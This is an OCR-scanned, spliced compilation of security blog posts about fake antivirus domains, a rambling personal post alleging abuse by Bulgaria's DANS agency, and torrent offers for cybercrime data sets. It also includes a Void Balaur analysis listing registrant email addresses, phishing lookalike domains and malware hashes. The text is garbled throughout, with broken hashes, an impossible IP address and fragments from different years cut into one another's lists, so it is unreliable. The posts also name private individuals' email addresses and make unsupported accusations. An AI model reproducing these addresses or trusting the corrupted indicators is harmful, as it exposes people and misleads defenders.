4.9.1 A Diverse Portfolio of Fake Security Software - Part Five (2008-09-02 10:41) 
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[4] 


Visitors Visits 
Today: 1 af f 
Yesterday: 1 5,262 


Last 7 Days (Week): 8 38,656 

Last 30 Days (Month): 31 142,498 
Last 365 Days (Year): 319 330,408 
Total: 319 330,408 


[5] 


[ Msitors [____] Msits 
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Stay tuned! 


1, http: //aklw6fojficmu3zqsdsffprbas3kqrheej4ntvynf15xkr jpqhlq55yd. onion/ 

2, https://blogger. googleusercontent. con/ing//AVTAsE\ZQ605L9TEFBCyn,Kka87LXH@Ry ix0Gqpl6S6h Jonsz5FCodist TUR 
3, https: //blogger  googleusercont ent. con/ ing/ /AVKsEgy7é4it5-n4GhsHARNTEq@PVp~ 141166 BhxBva9KNKqukWineo6 gz 
4, https: //blogger .googleusercontent.con/ng/a/ AVXsEnYOoB_UpPVTKIBJTWnlhSMSRGLSMA1HixgIVOKUISK6 f8zBpAteqDi 
5. https: //blogger . googleusercontent . com/img/a/AVVXsEiSISF 1gV3-3E0zQ3z_y3Qy6SKDcalGTvVOXD7wpTmDQV31JrsQ39tiwl 


17.12.14 Why Did Bulgaria’s DANS Agency Gave Me a Visit and a Pension? 
(2021-12-25 05:12) 


[1] 


Dear blog readers, 


I’ve been persistently asked on what really took place back in [2]2010 when | was kidnapped 
by local police officers in my hometown Troyan Bulgaria using my stolen ID and back in 2015 
when | was drug poisoned by Bulgaria’s DANS Agency who gave me a visit to my place? Keep 
reading. 


It appears that back in my homeland it has a long way to go in terms of getting lost to the 
point of oblivion where when you don’t have anything it means don’t touch other people’s 
stuff or they will break your ankle and then politely take you back to your non-existent method 
of existence called a car in your homeland and politely ask you to enter and never think of 
coming back or going to anyone’s place again. Whether you are a moron or let’s not forget 
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whether you’re a Bulgarian or not take a photo of yourself and never show it to anyone. No 
one cares and we don’t care. Try to forget about the fact that you took a photo of yourself and 
believe it or not the photo never really existested. It does not exist. 


x 


By the way who hacked DANS.bg? We did not. We did not. Someone else did it and we came 
up with an [3]analysis on the topic. For free. Forget about public sources. We did it using public 
sources. 


Do you want to infect journalists with [4]malware? This is amusing as they have infected you 
already. With themselves. 


Do you want to celebrate the "holidays"? Do you know what a work day is to begin with? You 
can’t celebrate the holidays. There are no holidays. 


Don’t forget to use your ultra favorite Web site to post photos of your social spit and vomit and 
don’t forget no one cares. Including you. 


Sanctions [5Janyone? You bet. And yes you bet. 


Now the single most important thing to remember is to go back home. Only in case you know 
what a home is. Only in a case whether you have a home and never forget not to go to other 
people’s homes to do your naughty stuff. Steal rob kidnap molest and steal everyone’s money. 


This is not Bulgaria and this is not the holidays. 
Happy holidays! 
Stay tuned! 


1. https://1h3.googleusercontent . com/-1vo43EajFU8/YcK3vdSwDXI/AAAAAAAAewg/mn6s_9FcoSM92p-DcEE490V£ 7BOnrBjwgC 
BGAsYHQ/s1600/1640150970150251-0. png 


2. https://ddanchev. blogspot .com/2021/12/what-you-get-from-peasant-aria-land-new.htm 
3. https: //ddanchev. blogspot .com/2019/12/exposing-high-tech-brazil-hack-team.htm 


4. https: //wikileaks.org/hackingteam/emails/?q=anonymouskrelid=0émailboxid=0kdomainid=0éminrecipient=Oxmaxrec 
ipient=0koffset=1000 
5. https://home.treasury.gov/news/press-releases/jy0208 


17.12.15 Presenting Dancho Danchev’s Ultimate "Cybercrime Research Compila- 
tion" - Direct Download Available! (2021-12-28 16:47) 


[1] 
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Dear blog readers, 


Have you ever wanted to grab a direct download copy of all of my publicly accessible research 
in a convenient multiple E-Book readers compatible form including all the "juicy details" in 
terms of thousands of high-quality and never-released before loCs including OSINT research 
and analysis including threat intelligence type of research and analysis and information? 


[2]Grab a copy of the direct torrent download link! 


Sample screenshots of Dancho Danchev’s Ultimate "Cybercrime Research Compilation": 


[3] 


3 


3 


MAA 


Sample screenshots of Dancho Danchev’s Ultimate "Cybercrime Research Compilation": 
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IP Address * Host Name Original Name 


doctorantivi 


The "campaign managers" behind these [1]fake security software propositions are not just 
starting to take park them at up to three different locations, [2]localize the sites to different 
languages and introduce [3]client-side exploits, just in case the end user gets suspicious and 
doesn’t install it, but also, the natural evasive practices. For instance, once some of their 
domains get detected and blocked, they put them in a stand by mode and relaunch them 
online in a week or so, or ensure that only those coming to the domains from where they 
are supposed to come - yet another blackhat SEO or SQL injection attack - are the only ones 
getting to see the download screen. 


Some of the new additions parked at the same IPs offered by the "known suspects" in- 
clude : 


main-scanner .com - (777.244.220.138; 78.159.97.247; 89.149.209.251; 212.95.37.154) 
scanner-mainpro .com 
scanner-onlinel .com 
alldiskscheck300 .com 
myscanners101 .com 
download-al .com 
scanner-onlinel .com 
multilang1 .com 
ratemyblog1 .com 
multisearchl1 .com 
filescheck-list303 .com 
woodst-sale .com 
scanner-mainpro .com 
main-scanner .com 
directrevisions .com 
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my Cybercrime_Forum_Data_Set_2021 

) Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 

ry Dancho_Danchev_Blog_Archive_ JSON_2021 

PY) Dancho_Danchev_Blog_Cybercrime_Research_Photos_Compilation_2021 

& Dancho_Danchev_Blog_E-Book_Archive_2021 

& Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 
) Dancho_Danchev_Cybercrime_Research_2021 _Personally_Identifiable_Information_Compilation 
ad Dancho_Danchev_Cybercrime_Research_Personal_Photos_Compilation_2021 
db Dancho_Danchev_Cybercrime_Research_Presentations_2021 

ad Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 
ad Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 

ad Dancho_Danchev_Iran_Hackers_Personally_Identifiable_Information_Compilation_2021 
db Dancho_Danchev_Iran_White_Paper_2021 

ad Dancho_Danchev_Iran_White_Paper_Part_Two_2021 

PY) Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 

PY) Dancho_Danchev_Malware_Trends_White_Paper_2021 

a Dancho_Danchev_Medium_Research_Compilation_2021 

ad Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 

PY) Dancho_Danchev_Personal_Photos_Compilation_2021 

ad Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 

PY) Dancho_Danchev_Security_Policy_White_Paper_2021 

db Dancho_Danchev_Twitter_Account_Archive_2021 

db Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 

& Dancho_Danchev_Webroot_Research_Compilation_2021 

ad Dancho_Danchev_ZDNet_Research_Compilation_2021 

LL) WhoisXML_API_Research_Articles_2021 


Stay tuned! 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEi6ZAWiImSyrpgJ2v jxv8QCb8R6BgHXhnmmk66D02fZCQG4u_-51GXCq2 
6t13f£4COAmDgz9NIq2f3dC9E_wHnFMscgTyfXE8UetBZmD7g07 oBbh 


2. https: //unit-123.org/wp-content/uploads/2021/12/Dancho_Danchev_Cybercrime_Forum_Toolset_USB_Compilation_20 


21.rar.torrent 


3. https://blogger .googleusercontent .com/img/a/AVvXsEh6SFdJov4 jMMj 11FhJCKjQ7AwZJmX_iOwg6BMSic6wxoM9ThDC3gs41d 


OrMnazgqI-YWALu8pQi5IVa52T6X_nyfeVYBPfZxbpEs4oKLulWMvc 


17.12.16 Presenting Dancho Danchev’s Ultimate "Cybercrime Forum Data Set for 
2021" - Direct Download Available! (2021-12-28 16:52) 


[1] 
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<parent> Darkmoney iHonker ShadowMarket 
T1Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuitvn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell Maul Talk Szuwi 
Aljyyosh Forum. Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nulinoss.org Toolbabase se 
BigFozzy Free-hack pay-per-install org TotalBlackhat 
BlackhatWorld ghostmarket net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chi gofuckbiz.com ProLogic Whitehatyn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase WYAW.Opensc.ws 
Crack-F orum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket la iFud 


Dear blog readers, 


Have you ever wanted to give your team vendor or organization a boost in terms of 
cybercrime research for free? Consider grabbing a copy of my Ultimate "Cybercrime Forum 
Data Set for 2021" which you can use for data mining actionable threat intelligence including 
situational awareness building in terms of current and emerging cyber threats and 
cybercrime trends. 


[2]Grab a copy of Dancho Danchev’s official "Cybercrime Forum Data Set for 2021" torrent. 


Sample screenshots of Dancho Danchev’s Ultimate "Cybercrime Forum Data Set for 2021": 
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Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 111 PUBLICLY 
ACCESSIBLE CYBERCRIME-FRIENDLY FORUM 


Sample screenshots of Dancho Danchev’s Ultimate "Cybercrime Forum Data Set for 2021": 


[4] 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEg00h- egBhJzjXZFr_9Tsfc5dWqs jLODGxyCd1lIMD_UZGrEpMZyy50ZsZ 
xJi70GIjCTymgmYuS JkmWxKZtrPSuf4Ui0Ngq4NbWJ4EBeCxXr9ICg9 


2. https: //unit-123.org/wp-content/uploads/2021/12/Dancho_Danchev_Cybercrime_Forum_Data_Set_Latest_2021.rar.t 


3. https: //blogger .googleusercontent .com/img/a/AVVXsEhWE2gW5pvY17NDorZj 264H7pd2Z4h39ZHDPQgY04cnYBal3Q-nsB j XuC 


vLR72ZP 1 jC6FbKTo8YVIDanmoRrzkwk8j 1Mk1QuEItq4PByyH003 
4. https://blogger. googleusercontent.com/img/a/AVvXsEjMNipH_ju3VPiU5y JihZA JpBRAaAopgvi-5TMZ4FFVsUzptVpxQz2Rv 


1YhJhXioGFP8UKFYa0WGn19hksFIV14FswWOIc4i9wh_HmVOR1wDNTj 


Stay tuned! 
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17.12.17 A Visual Representation of Today’s Modern Cybercrime Ecosystem - A 
Cybercrime-Friendly Forum Communities Screenshots Compilation - An 
Analysis - Part Two (2021-12-30 12:32) 
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2022 


18.1 January 


18.1.1 "It’s Full of Secrets of User-Generated Classified Information" - The Inside 
Story Behind the Infamous Bulgarian Hacker Dancho Danchev from the 
Trenches up to Present Day (2022-01-20 19:43) 


Cyber 


Intelligence 


[1] 


A modern whiz-kid child story of the son of an ex-Communist era famous family from Bulgaria 
up to present day from the trenches in the world of computer security from the 90’s up to 
present day as the world’s leading expert in the field of cybercrime research 


Who would have thought? 


A 20+ something Bulgarian dude an ex-hacker teenager enthusiast from Bulgarian that suc- 
cessfully compromised the official Web site of his hometown using what he believes to be 
the first known case of successful social engineering as today’s world’s leading cybercrime 
researcher security blogger and threat intelligence analyst making the news at TechMeme and 
Techcrunch including the headlines at Slashdot to have successfully visited the GCHQ to make 
a presentation and to have successfully been invited to Canada’s Secret Service headquar- 
ters to make a presentation - a true marvelous story of user-generated classified and sensitive 
cyber attack and cyber attack trends information begins to unfold a practice courtesy of the 
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same individual that he’s been doing for over a decade currently running one of the security 
industry’s most popular security publications with over 5.6M page views and approximately 
6M direct clicks interactions with his Dancho Danchev’s Blog - Mind Streams of Information 
Security Knowledge blog using Feedburner. 


1. https://blogger.googleusercontent.com/img/a/AVvXsEiGkTIOffPerLb3BU2bZFuyilR£f4TDqAa31n31QK87xf4x4Vbs1lwBOOTP 
b30zrKHESZNGEbfG_A9Irfa5vyGxyWsU006Jr_fGWWYHZHBM_PBlyf 


18.1.2 TrendMicro Releases New Report on a New Cybercrime Group called “Void 
Balaur” - An OSINT Analysis (2022-01-20 20:34) 


[1] 


an ar an on 
@ 


Based on TrendMicro’s recently released report on the Eastern European cybercrime syndicate 
known as "[2]Void Balaur" I’ve decided to proceed further and enrich the original loCs (Indica- 
tors of Compromise) using public sources including my employer’s - WhoisXML API's - real-time 
and historical WHOIS database and look for additional clues and offer an in-depth analysis and 
practical and relevant threat intelligence that could assist you in potential cyber attack and 
cyber threat actor attribution campaigns. 


Sample related domain registrant personal email accounts known to have been involved in 
the campaign include: 


joah.jn.hatcher9@yahoo.com 
aasod@intopwa.com 
newdata.inc@yahoo.com 
bas@viciousinertia.com 
a@180180.com 
dizain.alto@yandex.ru 
k.staromoskovskaya@ya.ru 
bady3617@gmail.com 
koolfootball guy@hotmail.com 
slava.solgalov.87@mail.ru 
x430249@pm.me 
poxxpoz@pm.me 
edi80112@gmail.com 
mikhaylovich _andreyka@bk.ru 
b.adanl@walla.co.il 
1144199676@qq.com 
alinaabramova419@yandex.ru 
sylilac7@naver.com 
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osintdmarc@pm.me 
ANONSPF@GMAIL.COM 
it@sms191.com 
belov.alekey@mail.ru 
mailhelpi@mail.com 
didichenkodmitrana@protonmail.com 
gqe5rg2435hg456g@gmail.com 
enkay448@gmail.com 
remoterdp5575@pm.me 
smokapokas@gmail.com 
samirnet2@gmail.com 
denismininlan@gmail.com 
zoakotovic@gmail.com 
asad11112@gmail.com 
angelahourston098@outlook.com 
velikpnov.1992@mail.ru 
kiyera7657@gameqo.com 
qbproadvisors@gmail.com 
maksymkhmarskyi23@gmail.com 
yasuokajiro@yahoo.co.jp 


including the following related malicious and rogue and fraudulent domains known to have 
been registered using the same email accounts: 


acccount-login-google.com 
go-plans.info 
cloud-account-goglemail.com 
myaccounts-profile-gmail.com 
go-living.info 
myaccounts-cloud-goglemail.com 
passport-yandex.com 
go-commands.info 
my-account-login-gmail.com 
go-halves.info 
account-mail-goglemail.com 
go-features.info 
mysecurity-goglemail.com 
mycloud-goglemail.com 
security-goglemail.com 
goplans.info 
accounts-login-gmail.com 
notice-56750007.online 
myaccount-security-goglemail.com 
simple-controls.info 
my-account-login-google.com 
myacccount-login-google.com 
verifsecuritu.online 
go-gadgets.info 
mail-yahoo-account.com 
account-login-google.com 
go-automation.info 
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fixerman.top 
com-a2.icu 
mail-auth.top 
secretonline.top 
house-of-ella.com 
sevis.top 
fwerifw4589g6uwrt.icu 
simplecontrol.info 
checkid.top 

ru-h4.icu 
blotckcnain.com 
scvrs.top 
blpockcnain.com 
idhelp.top 
bindwalk.com 
go-home-automation.info 
lockto.top 
blohckcnain.com 
in-apple.top 
fwerfo23450tgi24e5t.com 
go-plan.info 

id-src.top 
blockchain.ru.com 
my-lock.top 
go-automatic.info 
attachment3421.xyz 
lockgo.top 
go-clouds.info 

id-act.top 

reauth.site 

my-id.top 

n101.site 
usersessioncheck.rest 
usersessioncheck.space 
usersessioncheck.online 
my-acounts-gooogle.com 
idf1.site 

id101.best 
acountc-mail.com 
id102.rest 
myacountc-gooogle.com 
guards.fun 
myacounts-mail.com 
signid.fun 
myacountc-mail.com 
idf2.site 
myacounts-gooogle.com 
n101.fun 
myacount-mail.com 
id7.fun 
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myaccountsc-gmail.com 
id101.site 
myacountc-email.com 
s04.fun 

signid.site 
accountsc-gmail.com 
idsl1.site 
admin-gogle.site 
admin-goo.site 
gosecurity.info 
mail-maga.site 
index0O.site 
go-climate.info 
mailmaga.site 
calendar-jp.site 
go-media.info 
admin-jp.site 
infopack.site 
go-docs.info 
no-reply-jp.site 
no-replys.site 
gobuttons.info 
2rel.site 
mail-magazines.site 
go-connect.info 
mail-magazine-jp.site 
new-jp.site 
go-bank.info 
magazine-jp.site 
mail-magazine.site 
go-music.info 
nordopl.site 
andr24-3.xyz 
fo4tool.xyz 
tox24h.xyz 
andr24-1.xyz 
forpros.site 
go-control.info 
online24-shop.website 
toxmag24.xyz 
go-security.info 
dostavkasafety.site 
multi-kuxnya.website 
go-vids.info 
mailer-daemon.site 
dostavkasafety.space 
go-comfort.info 
sc-noreply.site 
info-jpp.site 
go-buttons.info 
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mail-daemon.site 
announce-jp.site 
go-lighting.info 
only-true.site 
big-top.site 
cooltop.online 
over-mag.site 
andr24-2.xyz 
hot-top.site 
kristinaleonova.xyz 
24h-tool.xyz 
and1imag.xyz 
only24hs.com 
new-online24.fun 
skifltd.site 
ondiman-keit.space 
news24online.fun 
tvoe24na7.site 
fo24tool.xyz 
simple-control.info 
myaccounts-login-google.com 
email-redir.space 
go-commanad.info 
defaultsetup.space 
go-halfs.info 
redir-email.space 
smartresponder.space 
go-reward.info 
redirect-email.space 
smartrespond.space 
go-lights.info 
rusfssp.space 
defaultsettings.space 
go-custom.info 
email-redirect.space 
newtop24.site 
topers24.site 
mango24.site 
go-pics.info 
top24mag.site 
go-button.info 
smalluser.org 
iinfoacccounts.org 
inboxlimiteds.org 
infostory.org 
accountschain.org 
iinfoacccount.org 
accountslink.org 
i-info-acc-count.org 
accountsassociate.org 
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© Doctor Anitvirus 2008 


Doctor Antivirus 2008 a ® seovcrt 


Protect your PC 


? System Scan 


] Security 


Doctor Antivirus 2008: System Scan 


© Backdoor c:\Program Files This Trojan downlos... Trojan-Clicker. Win3.. 
\ Backdoor Hidden Desktop This Trojan is desig... Trojan-Proxy.'Win32. 
@ Spyware C:\WINDOWS This Trojan is desig... Trojan-PSW.Win32... 
© Backdoor Hidden Desktop This Trojan is desig... Backdoor.\Win32.Ag.. 
© Backdoor c:\Program Files This is a family of b...  Trojan-Clicker.HTML. 
° Spyware C:\WINDOWS This Trojan program... Trojan-Downloader. . 
© Spyware c:\Program Files This Trojan is desig... Trojan-Dropper.Ms.. 
° Trojan autorun This Trojan provide...  Trojan-PSW.Win32... 
@ Spyware Hidden Desktop This Trojan opens a... Trojan-Proxy.\Win32. 
. Trojan Hidden Desktop This Trojan is desig... Trojan-Dropper.MS.. 
° Spyware ¢:\Program Files This Trojan uses sp... Backdoor.\Win32.Liv.. 
@ Sovware autorun This Trojan launche... _Troian-Proxy.\Win32,_~ 


scornig: (IMMMMMMMMMMMMMMER Cs) [Remove | 


Path: c:\Documents an...onlinestores.metaservices.microsoftf1].txt 
Infections Found: 40 Save Report 


supersolution-freeantivirus .com - (213.155.2.69) 


antivirus-bestsolution .net 
antivirus4protection .net 
antivirusproxp .com 
freebest-antivirus .net 
goodantivirus-free .net 
noadwareantivirus .com 
pwrantivirus2009 .com 
solution-freeantivirus .com 
supersolution-antivirus .com 
supersolution-freeantivirus .com 
antivirusdwl .com 
securesoftdl .com 
viva-codec .com 
win-antivirus-protect .com 
avxp-2008 .net 

antivirusq .net 
antivirus2008b .net 
antivirus2008m .net 
antivirus2008n .net 
antivirus2008v .net 
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in-box-limited.org 
infoaccounts.org 
storylinks.org 
in-hit-limited.org 
inhitlimited.org 
infohistory.org 
localuser.org 
lil2.top 

lil3.top 
googurl-jp.site 
limitedusers.net 
historyshort.net 
onlineloginaccount.net 
loginbook.net 
bestlimiinfo.net 
beshortaccount.net 
infoaccountant.net 
accountsupportgroup.net 
in-box-limiteds.org 
i-info-acc-counts.org 
limi-note.net 
litmonger.com 
All.site 

2li.site 

l-jp.site 

i-l.site 

i-e.site 

i-k.site 

mu64.xyz 

j-jp.site 

iri6.xyz 

lu2.xyz 

ijs8.xyz 
garant-sms.com 
lui7.xyz 

0i99.xyz 

iil4.xyz 

lid4.xyz 
juicegame.site 
iel5.xyz 

lik2.site 

git9.site 
go-safety.info 
oll7.site 
index7.site 
go-feeds.info 
9-jp.site 

8-jp.site 
go-controls.info 
c-jp.site 
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s-jp.site 
go-tunes.info 
il-com.site 
es-co.site 
go-buttons.com 
e-7.site 

2-jp.site 
go-controls.com 
i-O1.site 

1-jp.site 

u-jp.site 

liyt.site 
go-button.net 
accounts-link.org 
iknowacccounts.org 
i-know-acc-counts.org 
inboxshort.org 
iinfoaccnumber.org 
storysupport.org 
inboxlocal.org 
info-accounts.org 
servershort.com 
townlimiteds.com 
storysupport.net 
slavelimiteds.net 
globallimitedaccount.com 
local-accounts.org 
web-locals.com 
serverlimiteds.com 
limited-user.org 
info-accs.org 
i-info-acc-total.org 
info-acc.org 
infoaccs.org 
knowacc.org 
iinfoacctotal.org 
noteacc.org 
myaccountsupports.org 
infoacc.org 
accounts-links.org 
i-info-acc-result.org 
limitedcustomer.org 
iinfoaccresult.org 
accountslinks.org 
limiteduser.org 
infoaccount.org 
inboxlimited.org 
webinfoacc.org 
limitedusers.org 
limitedusergroup.org 
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shortuser.org 
note-acc.org 
historysupport.org 
history-link.org 
messageacc.org 
knowaccs.org 
incaselimiteds.org 
knowaccount.org 
accountslinktech.org 
incaselimited.org 
know-account.org 
infoaccountant.org 
accountantsupport.org 
shortusers.org 
infoacctech.org 
limited-users.org 
note-account.org 
historysupports.org 
messageaccount.org 
iknowacccount.org 
accountsupportgroup.org 
web-info-acc.org 
accountsupports.org 
interestlink.org 
accountsnetwork.org 
inpacklimited.org 
noteaccount.org 
mawuewye.pro 
mondohorse.com 
servicehelpsonline.net 
limitedlinkservers.net 
story-support.net 
gameigy.pro 
limitedbuyer.org 
noteaccounts.org 
adviceaccounts.net 
in-box-short.com 
server-onlines.com 
historylimiteds.com 
serverservicesinc.com 
interally.info 
mondohound.com 
gleewizard.org 
inboxsmall.org 
dosugcentr.com 
accounts-my-yahoo.com 
account-my-gogle.com 
myaccounts-yahoo.com 
account-my-yahoo.com 
mail-my-gogle.com 
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mysecurity-gogle.com 
my-accounts-gogle.com 
myaccount-mail-gogle.com 
acount-my-google.com 
myaccounts-google.com 
my-account-gogle.com 
mailer-exmo.site 
fssprus.ru.com 
usersignin.site 
mailer-exmo.host 
myacountc-google.com 
aabsnjidmhmp1li430.space 
myaccountc-google.com 
xaxtfnrga4giugueO.space 
tpdacmyd3pnt5xzpt.space 
acountsc-google.com 
ecyyi6Olgprwim08b.space 
d2xduzcumareyybza.space 
qpfrit3ela5v6icsa.space 
yfoad9wcfjt8clumz.space 
servicelogin.site 
fssprus.space 
Ogew2cnnfil8tcz80.space 
jimoddrw9aav/7/lvzc.space 
nurmohammod.com 
bOlav8kzmjvfi4gbg.space 


Case in point is hxxp://historyshort.net where we have the following malicious and fraudulent 
MD5s known to have phoned back to the same C &C (Command and Control) server domain: 


e5f640f5e6d66b24941e0eb1288c6d1dc701lee2b2aled0d13cfdbc3c7d544537 
ca4b0ec3bdccab86ded98ddfeedb2168f78c4e90cebb841a21c285941bcadab4 
7a48881967f88284e6cdd70a8f241be9109d6fe7086fbc6c5b8232cd7 0fd360c 
3cc2668d4c7f1e292ee905d6318fe85851935124b01620549a56a9b40e8adb07 
43f3427leab8f00dccefe59450f4958d30cf6f269128c5668b91f82396b4aa81 
4ed9411b9a88c6c17fa5e33a24dd01df1lbf03470261d02b036673be68029be15 
e0ecc9229dd6a36286ebfccel27414ad0bal1276bc6f46ee94a7b1bce40717Ff2 
3f502dd72fb8811c049ee5a4a4f8f53a65ede05c66838652eb121737d742ae20 
2bc197b47b81a852d8d6ce87d93b83c2a6c4f2b4d70085f3435f7caaa552a5b8 
d364b7e65bcc5348c6153be54b3d46ee614be32de475e74b161165d586bcb756 
ded6081876e5e27fcOacf0406fcd0d779304fcd532a960dd1b91leb8ce8bcf891 
629b5909b0de8437c470b36b267c962dc0a3e1fa53948e2a713b3573732460c9 
O09af2bcd87d75c0269f48bd1b8099dbca48a05617c58074ff0b05506e4ddb3db 
a3f35d4908ffeb6a35e8ca502e4d9b8f470b6750fe5849033812cfb763d4054f 
e3fa4f7 4046987 76ddbae0c8c192d3c59f9e287 7b266318703f816db3ff85cel 
4c1a553fa890979ed433984c478dc84b269c450d42e09dc7b2f2980e836c8cle 
4bfb90ebd7478bab9a19381b092cad5c9f5351091f3bd668614598f038ffal30 
3302019e94ca862959814418bda60db06c185918e2c5f79a52530dd4d92edalc 
180a429f1d98306cadac4453f900bb3ffF76F7a54da8cc300380af055b92217dc 
5cee25f5fdc7327f590b3da7818346ba471cc856643bf0762f1cc16cd0bd48ea 
b54a786c73e596f930b88bb7 75e56a6fe4 72c7e812b971adac3985b87bf282f5 
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44dfd9a5ab0147248bc43a44794407b6cf927e1a6267f92b5e93ec79668ee589 
88e99009c0ca934949576adfcal9e602f4b2F75448d3dd196e675ba9c3e5a7d1 
b8eb6e094553a82 7fdec58aed17bb0c0c9215ad4119833880dfae030a99440d5 
38481c8b5d86923946a393aeaf2d6bc6e916259738a415cd9fb92077¢c345be70 
707b2fffel568ae355dc9e0fcd76ead25bb22fec46ad8cf8a33e5ccdd48d97b6 
0c6b75c69a73d582ab64378624d3e1e9c514ef03f0a05a399797655510ad034d 
2cb10ef17ea8204e81dc425fdf442a9e9dd457e11733ab9158057b44aa232f38 
106a724fd95a5fc6f17247aed46068f9f6ccc11d62bb1001c2a0cd28bdebe249 
c3ac9c963945e4389dd0b8e39ffla4de4addb8b065584f48e810e1d12c032954 
a412e6c886d70cafe8acb0076c121ba574b80b2111878ae79fa2681e554ec746 
f7af2b25a3fla765b5b1ca56478db7c297071368aaaf3f48b83f78898dd4a28d 
70600a363a7458d7962af27cdef1d683e212ee78b4b7c981c8ffdb3724d01608 
485b7e024c956b88f45 70669a81fdea29ca3745d7bb3fc7bcdfd50df004f3896 
lbda2b544bf90f7eece869a4fba88ea761e598bf159a799b2135bea4ca8242f8 
977b4e0b097ab6c455a47018658857d3d1e4c4a70c67 76cfac39db124a3f4c88 
bc3312ec1322713b51e2319745f6070beb09cbb0033501be2d58933f879be81le 
bc2f434f8fc66d13a85a077570bad230851297dca0eade40e26ec72dc7c55dfb 
391ca088a04ccbe938e8a0cc9f6259924d1e31539adaa7337674baffa9ee3e96 
b0220128177613213e2bc2d0fd3d4040f1fce97b8dbd509f450c75cfb8d94604 
4c349905e97d11cba75eccd447b805 7 9fbf941a8c36f9de9dae66f88e9905cdb 
3600a9baal6553fb471dc693b5bd33f4adc26dcf87a80ab7e1736768390c5580 
a8e09e4e965bb65f2fdal14c5b83b9e6d6b1b6f63dadf4e639e66caa83c86a34 
b1bb9d827b9120bbb1a8820b7f0f493dacb74527f1e8956b489866623c5a748a 
12739953d06fed1a90ad6e3852aed3f1l6adb54e406f061f23ac70f2ea8fc4b12 
a8447ac07182f6ca0037c7b46dfacec009523b79f8642c42249a6d5653acl10e0 
a8f95feeb607994db3239e2dfa48f9bf7c317d57cfd3dedf87e75b22e2916785 
dfO3dbfff5b2f5745e5e7d9e58bfe4a8249fa6221d15eld9fd9fcc1lb3ff2665f 
ac56d82315564401ddcd8e832f7b7b26ab6fdf4e85b87831e20692a2d9elfaf5 
67d02e17e1f385927d6195d7f78a846caac124a25004baddd0827ee34164b884 
66e094af1c8136e3e4cal8d63f8F365800592fcce92adcelle309cd6bce09499 
df1c4116471a7d2ee020369623f7c4ee0a57c5c80cc96a25alb/7ddb88c45bc8a 
932af35f952e782838daf79e7 20cf3b22a742a6b9b84c404cb612266aaa5b691 
e0beld27b425cf73e2007cb25e052b7aa4e93299fc69311c994bc32a7c1c53fa 
e90db87ae9efb8f5f0 ldabaecOeceeb72c4579f166879a118b964f9279101580 
68d1f4fddea2b3227676115afecf859247b0bebf40c55705f00eb53d7508be6c 
8c5372f16c1c5e505bb34f33e95a5d6a6f13c9dae05a4aa9F757f1783987d72a 
fc7461ec6bd665dc08800d1a9c50f85858668ef023a6c81498c0e3748f50e671 
141171357bbe9fe15e53a058a49d44abd4e95a51b63c74ee22d424f9bee6e5c5 
792138f32f6a1a94d64a9a0941f4ca5ec5ea26fd342ae7a44c762405ae5d643c 
06e71f61a58724b1lacd7761e671623605d51742704cb49b01c1fffEf96de9d6e 
37e88a05a5455bf4f2d080482d6fa3e7 1f3b97c53853c2f3118067bb8c10c552 
b59a0e02e1db6984b55f079256dd541bd61e0c2629c63147ca98d9c43cf32b0b 
c14a537e9217276965e080b4b14a96e3589be380dae2c3168a86f6695f023946 
603444fa38db8a88a94b2a5f1f24e461c804d368d73d31e3bdcdea7c80a8ae31 
08600974031f79c35c5d18e95e9c66760c14fb1cac7ed00fec40d7615bc3b1b3 
c9b5607 7effc58eed00d7921b788af2bc6c92894028e218ab1d49f6d47c95f41 
b189d0126528c8b2e1b31df3da66307b6123e2e40d0b4f8c58c6777e98bbca26 
bada9099b2d637bb8663061d5aa9ca5ec103731270b0b1cb1leaal3ba4c9e2ce 
3f2c9c80ee3d443165c2c868078b43782d3aff5946382c5ebfe86a5266ccb26e 
c389bedbb58ea7d76el1lec7f061bd7b3191ee011e52b45aa4123922654436e135 
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7732051e9d1bdc0b722b33248f337007582d4b5381622206cd6028512d9e929f 
59e76392109a9cc5c43f125054384310ea836c9c831cc9567f6a987b1fc90a80 
3b4a8416112c4b07bec0c58f85e4e04ab6566914acc66567e2c2a61b8687727b 
5fdb67f0al1e5495f9f280da87766e03618e1f9852e79195c6218fe29ddea882 
ebb66474957a8355fd5ebd19693f28b61421e2b7a5fcd65f234ddd5c35023a68 
2fb47c12ed32e40b94d7eb7083bb20752b9fadf0874241237b2fd32bc98f384c 
b6c76909f5114097d77fc5f37265 75df625e0828aa09748fa4c2f9491f9bfle9 
5334a8e9ed0cc9dfd22446082c8ac6c918466bf1973e6d8a9314e2f4ca0f1lf49 
08d56e00f0f0abe99297c2b4817bafb90ea88e8b338d5d2918a5elcldd/7aea5d 
39ecf934a975b478efe0fc28b1e02882d633fa2bf705e98bfffb31laef2ac95d8 
568c6a406ddb74d5eb13c5be8bff318730da2a929fcfd7c38809539e1670ed50 
320c57e5edbc3f5d4735037e06b15c14151e8182f8a914971c1d3b1b534618a0 
c6a6b0508d3018c214ad347e8b87e4e26e9b00c4049bc69df347d50839fb02ad 
4ccf83919578882ff8930b0e7afe53de59a8a8c8008811a13ba241a26f6eedcf 
502908bb99c3bb34fb41faced3d0b75428562cc9e633db474cbb4627c7410205 
70a82507baa7dc6197bcOb0b8cac2745a0eb7bd97e569364db6bfcaae4962206 
O9bddf69ec92d4cc615273ea078af7 7f1ba4212e10224292bde24a0842f1b9dc 
